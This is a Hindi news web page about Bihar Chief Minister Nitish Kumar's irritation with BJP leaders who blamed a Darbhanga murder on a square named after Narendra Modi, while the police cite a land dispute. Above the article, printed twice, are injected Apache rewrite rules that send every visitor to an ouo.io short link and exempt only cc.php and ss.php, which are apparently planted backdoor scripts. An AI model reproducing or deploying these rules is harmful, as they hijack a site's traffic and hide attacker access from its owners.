
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 444
पटना। दरभंगा मामले में बीजेपी नेताओं की बयानबाजी ने नीतीश कुमार को परेशानी में डाल रखा है। इसके कारण इन दिनों बिहार के सीएम नीतीश कुमार भाजपाइयों से काफी खफा नजर आ रहे हैं। ऐसा लगता है कि दरभंगा मामले को लेकर नीतीश और बीजेपी नेताओं में तलवारें खिंचने लगी है।
बिहार के उप-मुख्यमंत्री सुशील कुमार मोदी ने कहा कि जमीनी विवाद की वजह से हत्या हुई, लेकिन इसके बाद केंद्रीय मंत्री गिरिराज सिंह और बीजेपी प्रदेश अध्यक्ष नित्यानंद राय ने कहा कि प्रधानमंत्री नरेंद्र मोदी के नाम पर चौक का नाम रखने की वजह से हत्या हुई है। कल पटना में नीतीश कुमार बीजेपी नेताओं के इन रवैये से खफा दिखे। उन्होंने कहा कि अभी दरभंगा जिला में घटना हुई और जमीन के झगड़े के कारण मर्डर हो गया। इस दौरान उसी में से किसी ने कह दिया कि मोदी के नाम से चौक बनाने की वजह से हत्या की गई। नीतीश ने कहा कि जब हमने मामले में डीजीपी से पूछा, तो उन्होंने कहा कि जमीन के झगड़े में मर्डर हुआ है। अब उसके बाद सुशील मोदी ने ट्वीट किया कि हमको जानकारी उन्होंने और पुलिस के लोगों ने दी। सीएम ने मीडिया से अपील की कि कोई भी मामले में बिना पड़ताल किए किसी आम आदमी के बयान को प्रमुखता से प्रकाशित नहीं किया जाना चाहिए। नीतीश कुमार ने कहा कि मीडिया की भी कुछ जिम्मेदारियां हैं।